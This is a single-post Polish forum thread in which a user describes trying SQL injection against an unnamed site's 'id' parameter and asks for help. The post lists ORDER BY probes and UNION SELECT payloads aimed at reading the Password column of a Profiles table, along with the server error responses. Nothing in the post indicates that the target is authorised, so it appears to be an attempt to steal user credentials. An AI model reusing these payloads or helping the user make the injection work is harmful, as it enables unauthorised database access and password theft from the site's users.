Pokaż wyniki 1 do 1 z 1

Temat: Problem z SQL Injection

  1. #1
    Zarejestrowany
    Sep 2012
    Postów
    12

    Domyślnie Problem z SQL Injection

    id=' order by 1/*

    otrzymujemy: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*', '1351628775', 'online')' at line 1

    id=' order by 2/*

    otrzymujemy: "Unknown column '2' in 'order clause'"

    Mam rozumieć, że kolumna jest JEDNA? Jednak co oznacza '1351628775', 'online' ? Co mam z tym fantem zrobić? Union select nie działa, uff, aż się spociłem

    Czy może olać to i sprawdzać tak?

    id=' and 1=2 union select 1,2 from Profiles where ID=1/*
    id=' and 1=2 union select 1,2,3 from Profiles where ID=1/*
    id=' and 1=2 union select 1,2,3,4 from Profiles where ID=1/*

    Tylko, że doszedłem do 1,2,3...50 ! i nadal jest:

    Database access error. Description: The used SELECT statements have a different number of columns

    Czy to możliwe, że więcej niż 50? 100 ? 200? SZOK, raczej nie, więc wszystko wskazuje na to, że select wyciąga JEDNĄ kolumnę. Jednak:

    id=' and 1=2 union select 1 from Profiles where ID=1/* lub
    id=' and 1=2 union select Password from Profiles where ID=1/*
    wywala:

    Database access error. Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1 from Profiles where ID=30/*'' at line 1

    Czy oznacza to, że atak SQL Injection nie jest możliwy? Czy coś robie źle?
    Ostatnio edytowane przez onequestion : 10-30-2012 - 21:08

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj